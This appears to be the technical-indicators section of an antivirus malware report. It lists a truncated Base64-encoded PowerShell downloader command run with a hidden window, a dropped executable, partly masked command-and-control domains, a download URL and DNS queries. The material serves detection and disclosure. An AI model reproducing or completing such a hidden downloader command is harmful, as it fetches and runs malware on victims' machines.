Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABqAF8AMAA2AF8AMAA9ACgAJwBhACcAKwAnADYAMQAnACsAJwAyAF8ANABfACcAKQA7ACQAVgAyADgAXwBfAF8AOABfAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAHYAXwA0ADIAXwAyADgAPQAoAC...
- %HOMEPATH%\85.exe
- 'qu##vn.com':80
- 'no####iannomad.com':80
- 'pa###oncern.com':80
- http://pa###oncern.com/eilRSaX2Ep
- DNS ASK qu##vn.com
- DNS ASK no####iannomad.com
- DNS ASK ku###x.online
- DNS ASK ra#e.by
- DNS ASK pa###oncern.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABqAF8AMAA2AF8AMAA9ACgAJwBhACcAKwAnADYAMQAnACsAJwAyAF8ANABfACcAKQA7ACQAVgAyADgAXwBfAF8AOABfAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAHYAXwA0ADIAXwAyADgAPQAoAC...' (with a hidden window)